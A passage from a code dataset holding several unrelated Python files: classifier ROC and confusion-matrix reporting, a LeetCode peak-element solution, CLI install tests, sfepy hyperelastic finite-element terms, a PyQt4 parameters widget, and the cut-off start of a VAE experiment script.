{0} ROC (area = {1:0.6f})'\n ''.format(i, roc_auc[i]))\n \n plt.plot([0, 1], [0, 1], 'k--', lw=lw)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC Curve')\n plt.legend(loc=\"lower right\")\n plt.show()\n\n# Prints ROC AUC for each gesture to the csv file. Also calls plotRoc if specified\n# by the user\ndef printRocCurve(f, score, test, isPlot):\n \n n_classes = len(set(classifications))\n\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n \n for i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(test[:, i], score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n \n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(test.ravel(), score.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n \n \n # Compute macro-average ROC curve and ROC area\n # First aggregate all false positive rates\n all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))\n \n # Then interpolate all ROC curves at this points\n mean_tpr = np.zeros_like(all_fpr)\n for i in range(n_classes):\n mean_tpr += interp(all_fpr, fpr[i], tpr[i])\n \n # Finally average it and compute AUC\n mean_tpr /= n_classes\n \n fpr[\"macro\"] = all_fpr\n tpr[\"macro\"] = mean_tpr\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\n \n f.write('\\nROC AUC')\n for i in range(len(roc_auc)-1):\n if i in roc_auc:\n f.write('\\nClass: {0}, {1:0.6f}'\n ''.format(i, roc_auc[i]))\n f.close() \n \n # if the user selected to plot the ROC curve on matlib, this is where\n # the plot function is called\n if isPlot == 'true': \n plotRoc(tpr, fpr, roc_auc, n_classes)\n\ndef printChart(f, clf, isPlot):\n \n ## When an array is too large, numpy prints the corners of the array and \n ## prints ... for the center. For displaying purposes, these statements\n ## print the entire array and remove the periods \n np.set_printoptions(threshold='nan')\n \n ## Generifies the script by basing the confusion matrix size off of\n ## the number of gestures in the set in the file. \n matrixSize = len(set(classifications))\n confMat = np.zeros((matrixSize, matrixSize), dtype=np.int) \n allPredictions = []\n allClassifications = []\n\n # confusion matrix calculations made\n allPredictions = []\n allClassifications = []\n\n for train, test in kf: \n clf.fit(features[train], classifications[train])\n predictions = clf.predict(features[test])\n allPredictions.append(predictions)\n allClassifications.append(classifications[test])\n \n \n allPredictions = np.concatenate(allPredictions)\n allClassifications = np.concatenate(allClassifications)\n \n\n#============================================================================== \n# ## needed only for the rawData128SinglePoint.csv file. This function can be \n# ## commented out/removed once new data is collected and used with this script\n# ## So when score and test are passed into printRocCurve, they just need the \n# ## matrix function\n allPredictions2 = relabel.replace(allPredictions)\n allClassifications2 = relabel.replace(allClassifications)\n# \n score = matrix(allClassifications2, len(set(allClassifications2)))\n test = matrix(allPredictions2, len(set(allPredictions2)))\n#==============================================================================\n\n ## Combines allPredictions and allClassifications into the confMat at the end\n ## REMEMBER TO REMOVE THE 2 AT THE END OF THE VARIBLES FOR THESE 2 LINES ONLY\n ## THIS IS ONLY FOR THE RAWDATA128SINGLEPOINT.CSV\n for i in range(len(allClassifications2)):\n confMat[int(allPredictions2[i])][int(allClassifications2[i])] = confMat[int(allPredictions2[i])][int(allClassifications2[i])] + 1\n \n # Classification Report returns a string that contains the chart, but\n # each element is not in a separate cell. Therefore, classRep splits\n # the string into an array of each of the elements, with 2 spaces as\n # the delimiter. \n classReport = classification_report(allClassifications,allPredictions)\n classRep = classReport.split(\" \")\n classRep[3] += ',' #lines up the Precision, Recall, f1, support row with\n #the rest of the table\n lineUp = len(classRep) - 11 \n classRep[lineUp] += ',' #lines up the avg/total row\n \n # Neatly displays the elements into individual cells\n for i in classRep:\n i = i + ','\n if len(i) == 1:\n continue\n else:\n f.write(i)\n \n f.write('\\n')\n \n ## Writes a readable confusion matrix into the csv file \n ## (writing it as-is to the file just displays illegal characters)\n ## Also displays Accuracy calculated from classifications and predictions\n confMat = np.array2string(confMat, separator=', ')\n f.write(confMat.replace('[', '').replace(']','')) #removes the brackets created when making a numpy array\n f.write(\"\\n\\nAccuracy:, \" + (\"%.6f\"%accuracy_score(allClassifications,allPredictions)))\n f.write('\\n') \n \n # called to print ROC AUC to the csv file.\n #printRocCurve(f, score, test, isPlot)\n ","sub_path":"Python_Scripts_TM/printDataTables_OneUser_NoCommand.py","file_name":"printDataTables_OneUser_NoCommand.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"122642061","text":"from typing import List\nclass Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n def binarySearch(l:int,r:int) -> int:\n if(l == r): return l\n mid = (l + r) // 2\n if(nums[mid] > nums[mid + 1]):\n return binarySearch(l,mid)\n else:\n return binarySearch(mid+1,r)\n return binarySearch(0,len(nums)-1)\n\n\n# 峰值元素是指其值大于左右相邻值的元素。\n\n# 给定一个输入数组 nums,其中 nums[i] ≠ nums[i+1],找到峰值元素并返回其索引。\n\n# 数组可能包含多个峰值,在这种情况下,返回任何一个峰值所在位置即可。\n\n# 你可以假设 nums[-1] = nums[n] = -∞。\n\n# 示例 1:\n\n# 输入: nums = [1,2,3,1]\n# 输出: 2\n# 解释: 3 是峰值元素,你的函数应该返回其索引 2。\n# 示例 2:\n\n# 输入: nums = [1,2,1,3,5,6,4]\n# 输出: 1 或 5 \n# 解释: 你的函数可以返回索引 1,其峰值元素为 2;\n# 或者返回索引 5, 其峰值元素为 6。\n# 说明:\n\n# 你的解法应该是 O(logN) 时间复杂度的。\n# 链接:https://leetcode-cn.com/problems/find-peak-element/","sub_path":"162. 寻找峰值/pythonCode.py","file_name":"pythonCode.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98498624","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\"This test module contains the tests for the `aea install` sub-command.\"\"\"\nimport os\nimport tempfile\nimport unittest.mock\nfrom pathlib import Path\n\nimport yaml\nfrom ..common.click_testing import CliRunner\n\nimport aea.cli.common\nfrom aea.cli import cli\nfrom aea.configurations.base import DEFAULT_PROTOCOL_CONFIG_FILE\nfrom tests.conftest import CLI_LOG_OPTION, CUR_PATH\n\n\nclass TestInstall:\n \"\"\"Test that the command 'aea install' works as expected.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.runner = CliRunner()\n cls.cwd = os.getcwd()\n os.chdir(Path(CUR_PATH, \"data\", \"dummy_aea\"))\n cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, \"install\"], standalone_mode=False)\n\n def test_exit_code_equal_to_zero(self):\n \"\"\"Assert that the exit code is equal to zero (i.e. success).\"\"\"\n assert self.result.exit_code == 0\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Teardowm the test.\"\"\"\n os.chdir(cls.cwd)\n\n\nclass TestInstallFromRequirementFile:\n \"\"\"Test that the command 'aea install --requirement REQ_FILE' works.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.runner = CliRunner()\n cls.cwd = os.getcwd()\n os.chdir(Path(CUR_PATH, \"data\", \"dummy_aea\"))\n\n cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, \"install\", \"-r\", \"requirements.txt\"], standalone_mode=False)\n\n def test_exit_code_equal_to_zero(self):\n \"\"\"Assert that the exit code is equal to zero (i.e. success).\"\"\"\n assert self.result.exit_code == 0\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Teardowm the test.\"\"\"\n os.chdir(cls.cwd)\n\n\nclass TestInstallFails:\n \"\"\"Test that the command 'aea install' fails when a dependency is not found.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.runner = CliRunner()\n cls.agent_name = \"myagent\"\n\n cls.patch = unittest.mock.patch.object(aea.cli.common.logger, 'error')\n cls.mocked_logger_error = cls.patch.__enter__()\n\n cls.cwd = os.getcwd()\n cls.t = tempfile.mkdtemp()\n os.chdir(cls.t)\n result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, \"create\", cls.agent_name], standalone_mode=False)\n assert result.exit_code == 0\n os.chdir(cls.agent_name)\n result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, \"scaffold\", \"protocol\", \"my_protocol\"], standalone_mode=False)\n assert result.exit_code == 0\n\n config_path = Path(\"protocols\", \"my_protocol\", DEFAULT_PROTOCOL_CONFIG_FILE)\n config = yaml.safe_load(open(config_path))\n config.setdefault(\"dependencies\", []).append(\"this_dependency_does_not_exist\")\n yaml.safe_dump(config, open(config_path, \"w\"))\n cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, \"install\"], standalone_mode=False)\n\n def test_exit_code_equal_to_1(self):\n \"\"\"Assert that the exit code is equal to 1 (i.e. catchall for general errors).\"\"\"\n assert self.result.exit_code == 1\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Teardowm the test.\"\"\"\n os.chdir(cls.cwd)\n","sub_path":"tests/test_cli/test_install.py","file_name":"test_install.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"652073610","text":"from sfepy.terms.terms import *\nfrom sfepy.terms.terms_hyperelastic_base \\\n import CouplingVectorScalarTL, HyperElasticBase\nfrom sfepy.terms.terms_base import VectorVector, ScalarScalar, InstantaneousBase\n \nclass HyperElasticTLBase( HyperElasticBase ):\n \"\"\"Base class for all hyperelastic terms in TL formulation. This is not a\n proper Term!\n \"\"\"\n use_caches = {'finite_strain_tl' : [['state']]}\n mode = 'tl'\n\nclass NeoHookeanTLTerm( VectorVector, HyperElasticTLBase ):\n r\"\"\"\n :Description:\n Hyperelastic neo-Hookean term. Effective stress\n :math:`S_{ij} = \\mu J^{-\\frac{2}{3}}(\\delta_{ij} -\n \\frac{1}{3}C_{kk}C_{ij}^{-1})`.\n\n :Definition:\n .. math::\n \\int_{\\Omega} S_{ij}(\\ul{u}) \\delta E_{ij}(\\ul{u};\\ul{v})\n\n :Arguments:\n material : :math:`\\mu`,\n virtual : :math:`\\ul{v}`,\n state : :math:`\\ul{u}`\n \"\"\"\n name = 'dw_tl_he_neohook'\n arg_types = ('material', 'virtual', 'state')\n\n family_data_names = ['detF', 'trC', 'invC']\n term_function = {'stress' : terms.dq_tl_he_stress_neohook,\n 'tangent_modulus' : terms.dq_tl_he_tan_mod_neohook}\n \n def compute_crt_data( self, family_data, mode, **kwargs ):\n mat = self.get_args( ['material'], **kwargs )[0]\n\n detF, trC, invC = family_data\n\n if mode == 0:\n out = nm.empty_like( invC )\n fun = self.term_function['stress']\n else:\n shape = list( invC.shape )\n shape[-1] = shape[-2]\n out = nm.empty( shape, dtype = nm.float64 )\n fun = self.term_function['tangent_modulus']\n\n fun( out, mat, detF, trC, invC )\n\n return out\n\nclass MooneyRivlinTLTerm( VectorVector, HyperElasticTLBase ):\n r\"\"\"\n :Description:\n Hyperelastic Mooney-Rivlin term. Effective stress\n :math:`S_{ij} = \\kappa J^{-\\frac{4}{3}} (C_{kk} \\delta_{ij} - C_{ij}\n - \\frac{2}{3 } I_2 C_{ij}^{-1})`.\n\n :Definition:\n .. math::\n \\int_{\\Omega} S_{ij}(\\ul{u}) \\delta E_{ij}(\\ul{u};\\ul{v})\n\n :Arguments:\n material : :math:`\\kappa`,\n virtual : :math:`\\ul{v}`,\n state : :math:`\\ul{u}`\n \"\"\"\n name = 'dw_tl_he_mooney_rivlin'\n arg_types = ('material', 'virtual', 'state')\n\n family_data_names = ['detF', 'trC', 'invC', 'C', 'in2C']\n term_function = {'stress' : terms.dq_tl_he_stress_mooney_rivlin,\n 'tangent_modulus' : terms.dq_tl_he_tan_mod_mooney_rivlin}\n\n def compute_crt_data( self, family_data, mode, **kwargs ):\n mat = self.get_args( ['material'], **kwargs )[0]\n\n detF, trC, invC, vecC, in2C = family_data\n\n if mode == 0:\n out = nm.empty_like( invC )\n fun = self.term_function['stress']\n else:\n shape = list( invC.shape )\n shape[-1] = shape[-2]\n out = nm.empty( shape, dtype = nm.float64 )\n fun = self.term_function['tangent_modulus']\n\n fun( out, mat, detF, trC, invC, vecC, in2C )\n\n return out\n\nclass BulkPenaltyTLTerm( VectorVector, HyperElasticTLBase ):\n r\"\"\"\n :Description:\n Hyperelastic bulk penalty term. Stress\n :math:`S_{ij} = K(J-1)\\; J C_{ij}^{-1}`.\n\n :Definition:\n .. math::\n \\int_{\\Omega} S_{ij}(\\ul{u}) \\delta E_{ij}(\\ul{u};\\ul{v})\n\n :Arguments:\n material : :math:`K`,\n virtual : :math:`\\ul{v}`,\n state : :math:`\\ul{u}`\n \"\"\"\n\n name = 'dw_tl_bulk_penalty'\n arg_types = ('material', 'virtual', 'state')\n\n family_data_names = ['detF', 'invC']\n term_function = {'stress' : terms.dq_tl_he_stress_bulk,\n 'tangent_modulus' : terms.dq_tl_he_tan_mod_bulk }\n\n def compute_crt_data( self, family_data, mode, **kwargs ):\n mat = self.get_args( ['material'], **kwargs )[0]\n\n detF, invC = family_data\n \n if mode == 0:\n out = nm.empty_like( invC )\n fun = self.term_function['stress']\n else:\n shape = list( invC.shape )\n shape[-1] = shape[-2]\n out = nm.empty( shape, dtype = nm.float64 )\n fun = self.term_function['tangent_modulus']\n\n fun( out, mat, detF, invC )\n\n return out\n\nclass BulkPressureTLTerm(CouplingVectorScalarTL, HyperElasticTLBase):\n r\"\"\"\n :Description:\n Hyperelastic bulk pressure term. Stress\n :math:`S_{ij} = -p J C_{ij}^{-1}`.\n\n :Definition:\n .. math::\n \\int_{\\Omega} S_{ij}(p) \\delta E_{ij}(\\ul{u};\\ul{v})\n\n :Arguments:\n virtual : :math:`\\ul{v}`,\n state : :math:`\\ul{u}`,\n state_p : :math:`p`\n \"\"\"\n\n name = 'dw_tl_bulk_pressure'\n arg_types = ('virtual', 'state', 'state_p')\n use_caches = {'finite_strain_tl' : [['state']],\n 'state_in_volume_qp' : [['state_p']]}\n\n term_function = {'stress' : terms.dq_tl_stress_bulk_pressure,\n 'tangent_modulus_u' : terms.dq_tl_tan_mod_bulk_pressure_u}\n\n def __init__(self, *args, **kwargs):\n Term.__init__(self, *args, **kwargs)\n\n self.function = {\n 'element_contribution' : terms.dw_he_rtm,\n 'element_contribution_dp' : terms.dw_tl_volume,\n }\n self.crt_data = Struct(stress = None,\n tan_mod = nm.array([0], ndmin=4))\n\n def __call__(self, diff_var=None, chunk_size=None, **kwargs):\n term_mode, = self.get_kwargs(['term_mode'], **kwargs)\n virtual, state, state_p = self.get_args(**kwargs)\n apv, vgv = self.get_approximation(virtual)\n aps, vgs = self.get_approximation(state_p)\n\n self.set_data_shape(apv, aps)\n shape, mode = self.get_shape_grad(diff_var, chunk_size)\n\n cache = self.get_cache('finite_strain_tl', 0)\n family_data = cache(['detF', 'invC'], self, 0, state=state)\n\n if term_mode is None:\n\n if mode < 2:\n crt_data = self.compute_crt_data(family_data, mode, **kwargs)\n if mode == 0:\n self.crt_data.stress = crt_data\n else:\n self.crt_data.tan_mod = crt_data\n\n fun = self.function['element_contribution']\n\n mtxF, detF = cache(['F', 'detF'], self, 0, state=state)\n\n for out, chunk in self.char_fun(chunk_size, shape):\n status = fun(out, self.crt_data.stress,\n self.crt_data.tan_mod, mtxF, detF,\n vgv, chunk, mode, 0)\n yield out, chunk, status\n else:\n fun = self.function['element_contribution_dp']\n\n mtxF, invC, detF = cache(['F', 'invC', 'detF'],\n self, 0, state=state)\n\n bf = aps.get_base('v', 0, self.integral)\n for out, chunk in self.char_fun(chunk_size, shape):\n status = fun(out, bf, mtxF, invC, detF, vgv, 1, chunk, 1)\n yield -out, chunk, status\n\n\n elif term_mode == 'd_eval':\n raise NotImplementedError\n\n elif term_mode in ['strain', 'stress']:\n\n if term_mode == 'strain':\n out_qp = cache('E', self, 0, state=state)\n\n elif term_mode == 'stress':\n out_qp = self.compute_crt_data(family_data, 0, **kwargs)\n \n shape = (chunk_size, 1) + out_qp.shape[2:]\n for out, chunk in self.char_fun(chunk_size, shape):\n status = vgv.integrate_chunk(out, out_qp[chunk], chunk)\n out1 = out / vgv.variable(2)[chunk]\n\n yield out1, chunk, status\n\n def compute_crt_data(self, family_data, mode, **kwargs):\n detF, invC = family_data\n\n p, = self.get_args(['state_p'], **kwargs)\n\n cache = self.get_cache('state_in_volume_qp', 0)\n p_qp = cache('state', self, 0, state=p, get_vector=self.get_vector)\n\n if mode == 0:\n out = nm.empty_like(invC)\n fun = self.term_function['stress']\n elif mode == 1:\n shape = list(invC.shape)\n shape[-1] = shape[-2]\n out = nm.empty(shape, dtype=nm.float64)\n fun = self.term_function['tangent_modulus_u']\n else:\n raise ValueError('bad mode! (%d)' % mode)\n\n fun(out, p_qp, detF, invC)\n\n return out\n\nclass VolumeTLTerm(CouplingVectorScalarTL, InstantaneousBase, Term):\n r\"\"\"\n :Description:\n Volume term (weak form) in the total Lagrangian formulation.\n\n :Definition:\n .. math::\n \\begin{array}{l}\n \\int_{\\Omega} q J(\\ul{u}) \\\\\n \\mbox{volume mode: vector for } K \\from \\Ical_h: \\int_{T_K}\n J(\\ul{u}) \\\\\n \\mbox{rel\\_volume mode: vector for } K \\from \\Ical_h:\n \\int_{T_K} J(\\ul{u}) / \\int_{T_K} 1\n \\end{array}\n\n :Arguments:\n virtual : :math:`q`,\n state : :math:`\\ul{u}`\n \"\"\"\n name = 'dw_tl_volume'\n arg_types = ('virtual', 'state')\n use_caches = {'finite_strain_tl' : [['state',\n {'F' : (2, 2),\n 'invC' : (2, 2),\n 'detF' : (2, 2)}]]}\n\n function = staticmethod(terms.dw_tl_volume)\n\n def get_fargs(self, diff_var=None, chunk_size=None, **kwargs):\n virtual, state = self.get_args( **kwargs )\n term_mode = kwargs.get('term_mode')\n\n apv, vgv = self.get_approximation(state)\n aps, vgs = self.get_approximation(virtual)\n\n self.set_data_shape(apv, aps)\n\n cache = self.get_cache('finite_strain_tl', 0)\n ih = self.arg_steps[state.name] # issue 104!\n mtxF, invC, detF = cache(['F', 'invC', 'detF'], self, ih, state=state)\n\n if term_mode == 'volume':\n n_el, _, _, _ = self.data_shape_s\n shape, mode = (n_el, 1, 1, 1), 2\n\n elif term_mode == 'rel_volume':\n n_el, _, _, _ = self.data_shape_s\n shape, mode = (n_el, 1, 1, 1), 3\n\n else:\n shape, mode = self.get_shape_div(diff_var, chunk_size)\n if self.step == 0: # Just init the history in step 0.\n raise StopIteration\n\n bf = aps.get_base('v', 0, self.integral)\n\n return (bf, mtxF, invC, detF, vgv, 0), shape, mode\n\nclass DiffusionTLTerm(ScalarScalar, Term):\n r\"\"\"\n :Description:\n Diffusion term in the total Lagrangian formulation with\n linearized deformation-dependent permeability\n :math:`\\ull{K}(\\ul{u}) = J \\ull{F}^{-1} \\ull{k} f(J) \\ull{F}^{-T}`,\n where :math:`\\ul{u}` relates to the previous time step :math:`(n-1)`\n and\n :math:`f(J) = \\max\\left(0, \\left(1 + \\frac{(J - 1)}{N_f}\\right)\\right)^2`\n expresses the dependence on volume compression/expansion.\n\n :Definition:\n .. math::\n \\int_{\\Omega} \\ull{K}(\\ul{u}^{(n-1)}) : \\pdiff{q}{X} \\pdiff{p}{X}\n\n :Arguments:\n material_1 : :math:`\\ull{k}`,\n material_2 : :math:`N_f`,\n virtual : :math:`q`,\n state : :math:`p`,\n parameter : :math:`\\ul{u}^{(n-1)}`\n \"\"\"\n name = 'dw_tl_diffusion'\n arg_types = ('material_1', 'material_2', 'virtual', 'state', 'parameter')\n use_caches = {'grad_scalar' : [['state']],\n 'finite_strain_tl' : [['parameter',\n {'F' : (2, 2),\n 'invC' : (2, 2),\n 'detF' : (2, 2)}]]}\n\n function = staticmethod(terms.dw_tl_diffusion)\n\n def get_fargs(self, diff_var=None, chunk_size=None, **kwargs):\n perm, ref_porosity, virtual, state, par = self.get_args(**kwargs)\n term_mode = kwargs.get('term_mode')\n\n apv, vgv = self.get_approximation(par)\n aps, vgs = self.get_approximation(virtual)\n\n self.set_data_shape(aps)\n\n cache = self.get_cache('finite_strain_tl', 0)\n # issue 104!\n if self.step == 0:\n ih = 0\n else:\n ih = 1\n mtxF, detF = cache(['F', 'detF'], self, ih, state=par)\n\n if term_mode == 'diffusion_velocity':\n n_el, n_qp, dim, n_ep = self.data_shape\n shape, mode = (n_el, 1, dim, 1), 2\n\n else:\n shape, mode = self.get_shape(diff_var, chunk_size)\n if self.step == 0: # Just init the history in step 0.\n raise StopIteration\n \n cache = self.get_cache('grad_scalar', 0)\n gp = cache('grad', self, 0, state=state, get_vector=self.get_vector)\n\n return (gp, perm, ref_porosity, mtxF, detF, vgv), shape, mode\n\nclass SurfaceTractionTLTerm(VectorVector, Term):\n r\"\"\"\n :Description:\n Surface traction term in the total Lagrangian formulation, expressed\n using :math:`\\ul{\\nu}`, the outward unit normal vector w.r.t. the\n undeformed surface, :math:`\\ull{F}(\\ul{u})`, the deformation gradient,\n :math:`J = \\det(\\ull{F})`, and :math:`\\ull{\\sigma}` a given traction,\n often equal to a given pressure, i.e.\n :math:`\\ull{\\sigma} = \\pi \\ull{I}`.\n\n :Definition:\n .. math::\n \\int_{\\Gamma} \\ul{\\nu} \\cdot \\ull{F}^{-1} \\cdot \\ull{\\sigma} \\cdot\n \\ul{v} J\n\n :Arguments:\n material : :math:`\\ull{\\sigma}`,\n virtual : :math:`\\ul{v}`,\n state : :math:`\\ul{u}`\n \"\"\"\n name = 'dw_tl_surface_traction'\n arg_types = ('material', 'virtual', 'state')\n integration = 'surface_extra'\n use_caches = {'finite_strain_surface_tl' : [['state']]}\n\n function = staticmethod(terms.dw_tl_surface_traction)\n\n def get_fargs(self, diff_var=None, chunk_size=None, **kwargs):\n trac_qp, virtual, state = self.get_args(**kwargs)\n ap, sg = self.get_approximation(virtual)\n sd = ap.surface_data[self.region.name]\n\n n_fa, n_qp = ap.get_s_data_shape(self.integral,\n self.region.name)[:2]\n n_el, dim, n_ep = ap.get_v_data_shape()\n self.data_shape = (n_fa, n_qp, dim, n_ep)\n shape, mode = self.get_shape(diff_var, chunk_size)\n\n cache = self.get_cache('finite_strain_surface_tl', 0)\n detF, invF = cache(['detF', 'invF'],\n self, 0, state=state, data_shape=self.data_shape)\n\n bf = ap.get_base(sd.bkey, 0, self.integral)\n\n assert_(trac_qp.shape[2] == trac_qp.shape[3] == dim)\n\n return (trac_qp, detF, invF, bf, sg, sd.fis), shape, mode\n\n def needs_local_chunk(self):\n return True, False\n","sub_path":"sfepy/terms/terms_hyperelastic_tl.py","file_name":"terms_hyperelastic_tl.py","file_ext":"py","file_size_in_byte":14448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173744334","text":"from PyQt4 import QtGui, QtCore\nfrom experimentgrid import ExperimentGrid\nfrom globalgrid import GlobalGrid\nfrom parametergrid import ParameterGrid\nfrom parameterlimitswindow import ParameterLimitsWindow\n\nclass ParametersWidget(QtGui.QWidget):\n def __init__(self, parent):\n QtGui.QWidget.__init__(self)\n self.parent = parent\n #set up layout\n self.mainLayout = QtGui.QVBoxLayout()\n font = QtGui.QFont('MS Shell Dlg 2',pointSize=14)\n font.setUnderline(True)\n self.experimentParametersLabel = QtGui.QLabel('Experiment Parameters')\n self.experimentParametersLabel.setFont(font)\n self.globalParametersLabel = QtGui.QLabel('Global Parameters')\n self.globalParametersLabel.setFont(font) \n #experiment parameters and global parameters\n self.widgetsLayout = QtGui.QHBoxLayout()\n self.miscLayout = QtGui.QHBoxLayout()\n self.experimentGridLayout = QtGui.QVBoxLayout()\n self.globalGridLayout = QtGui.QVBoxLayout() \n self.widgetsLayout.addLayout(self.experimentGridLayout)\n self.widgetsLayout.addLayout(self.globalGridLayout)\n #parameter limits button\n parameterLimitsButton = QtGui.QPushButton(\"Parameter Limits\", self)\n parameterLimitsButton.setGeometry(QtCore.QRect(0, 0, 30, 30))\n parameterLimitsButton.clicked.connect(self.parameterLimitsWindowEvent)\n self.miscLayout.addWidget(parameterLimitsButton)\n #create main layout and show\n self.mainLayout.addLayout(self.widgetsLayout)\n self.mainLayout.addLayout(self.miscLayout)\n self.setLayout(self.mainLayout)\n self.show()\n\n def setContexts(self, experimentContext, globalContext):\n self.experimentContext = experimentContext\n self.globalContext = globalContext\n #MR should not be hard coded\n self.setupExperimentGrid(['Wire', 'WireVoltageModulation'])\n self.setupGlobalGrid(['Wire', 'WireVoltageModulation']) \n\n def setupExperimentGrid(self, experimentPath):\n# try:\n# self.experimentGrid.setupExperimentGrid(experimentPath, self.experimentContext)\n# self.experimentGridLayout.addWidget(self.experimentParametersLabel)\n# self.experimentGridLayout.setAlignment(self.experimentParametersLabel, QtCore.Qt.AlignCenter)\n# self.experimentGridLayout.setStretchFactor(self.experimentParametersLabel, 0)\n# self.experimentGridLayout.addWidget(self.experimentGrid)\n## self.experimentGrid.disconnectSignal()\n## self.experimentGrid.hide()\n## del self.experimentGrid\n# except:\n# # First time\n########################################### working!\n# self.experimentGrid = ExperimentGrid(self, experimentPath, self.experimentContext)\n# self.experimentGridLayout.addWidget(self.experimentParametersLabel)\n# self.experimentGridLayout.setAlignment(self.experimentParametersLabel, QtCore.Qt.AlignCenter)\n# self.experimentGridLayout.setStretchFactor(self.experimentParametersLabel, 0)\n# self.experimentGridLayout.addWidget(self.experimentGrid) \n# self.setupExperimentGrid = self.setupExperimentGridSubsequent\n########################################### working!\n self.experimentGrid = ParameterGrid(self, experimentPath, self.experimentContext)\n self.experimentGridLayout.addWidget(self.experimentParametersLabel)\n self.experimentGridLayout.setAlignment(self.experimentParametersLabel, QtCore.Qt.AlignCenter)\n self.experimentGridLayout.setStretchFactor(self.experimentParametersLabel, 0)\n self.experimentGridLayout.addWidget(self.experimentGrid) \n self.setupExperimentGrid = self.setupExperimentGridSubsequent\n\n\n self.experimentGrid.show() \n\n def setupExperimentGridSubsequent(self, experimentPath):\n self.experimentGrid.setupParameterGrid(experimentPath)\n \n\n def setupGlobalGrid(self, experimentPath):\n########################################## working \n# self.globalGrid = GlobalGrid(self, experimentPath, self.globalContext)\n# self.globalGridLayout.addWidget(self.globalParametersLabel)\n# self.globalGridLayout.setAlignment(self.globalParametersLabel, QtCore.Qt.AlignCenter)\n# self.globalGridLayout.setStretchFactor(self.globalParametersLabel, 0)\n# self.globalGridLayout.addWidget(self.globalGrid)\n########################################## working \n\n self.globalGrid = ParameterGrid(self, experimentPath, self.globalContext, True)\n self.globalGridLayout.addWidget(self.globalParametersLabel)\n self.globalGridLayout.setAlignment(self.globalParametersLabel, QtCore.Qt.AlignCenter)\n self.globalGridLayout.setStretchFactor(self.globalParametersLabel, 0)\n self.globalGridLayout.addWidget(self.globalGrid)\n\n \n# self.globalGrid.disconnectSignal()\n# self.globalGrid.hide()\n# del self.globalGrid\n\n # First time\n\n# self.globalGrid.show() \n self.setupGlobalGrid = self.setupGlobalGridSubsequent \n \n def setupGlobalGridSubsequent(self, experimentPath):\n self.globalGrid.setupParameterGrid(experimentPath) \n \n def parameterLimitsWindowEvent(self, evt):\n experimentPath = self.experimentGrid.experimentPath\n try:\n self.parameterLimitsWindow.hide()\n del self.parameterLimitsWindow\n self.parameterLimitsWindow = ParameterLimitsWindow(self, experimentPath)\n self.parameterLimitsWindow.show()\n except:\n # first time\n self.parameterLimitsWindow = ParameterLimitsWindow(self, experimentPath)\n self.parameterLimitsWindow.show() \n","sub_path":"clients/guiscriptcontrol/parameterswidget.py","file_name":"parameterswidget.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"134215569","text":"#!/usr/bin/env python\n\n\nfrom __future__ import division\n\nimport os\nimport sys\nsys.path.append(\"../\")\n\nimport logging\nimport coloredlogs\nfrom time import time\n\nimport numpy as np\n\nlogger = logging.getLogger()\n\n\ndef run_experiment(args):\n # set environment variable for theano\n os.environ['THEANO_FLAGS'] = \"device=gpu\" + str(args.gpu)\n\n from learning.experiment import Experiment\n from learning.training import DSGNHTTrainer\n from learning.termination import EarlyStopping\n from learning.monitor import MonitorLL, DLogModelParams, SampleFromP, MonitorPosteriorMean\n from learning.dataset import Omniglot\n from learning.preproc import PermuteColumns, Binarize\n\n from learning.models.dgm_vae import VAEDGMLayerStack\n from learning.models.vae import VAE, StandardVAETop\n\n np.set_printoptions(precision=2)\n\n logger.debug(\"Arguments %s\" % args)\n tags = []\n\n np.random.seed(23)\n\n # n_samples to evaluate model\n n_samples_epoch = [1, 5, 25, 100]\n n_samples_final = [1, 5, 10, 25, 100, 500, 1000, 5000]\n\n # no. posterior samples for posterior mean\n postsamples = [int(s) for s in args.postsamples.split(\",\")]\n\n n_X = 28*28\n\n p_layers = []\n q_layers = []\n\n model = None\n\n # build the variational auto-encoder layer stack\n if args.layers == 1:\n latent_units = [50]\n hidden_units_q = [[200, 200]]\n hidden_units_p = [[200, 200]]\n\n n_Y = 